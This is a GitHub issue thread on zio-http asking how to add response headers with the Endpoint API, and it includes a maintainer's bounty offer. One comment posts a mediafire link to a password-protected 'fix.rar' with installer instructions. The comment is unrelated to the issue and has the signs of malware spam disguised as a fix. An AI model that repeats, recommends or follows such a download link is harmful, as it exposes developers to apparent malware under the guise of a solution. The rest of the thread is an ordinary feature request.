### ISSUE TITLE
Endpoint API Output headers

### ISSUE THREAD

**Issue by anqit** [zio/zio-http#3054]
**Is your feature request related to a problem? Please describe.**
Not sure if this is supported already or not, but the Endpoint API docs mention how to require headers on incoming requests, but I would also like to add them to outgoing responses.

**Describe the solution you'd like**
if none currently exists, function to add response headers when using the Endpoint API. if exists, updated docs would be great

**Describe alternatives you've considered**
Standard imperative route building

**Additional context**

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jdegoes** [comment]
/bounty $150 for any missing methods, documentation, and tests (btw I know I wrote code to add response headers so it may just not be exposed).
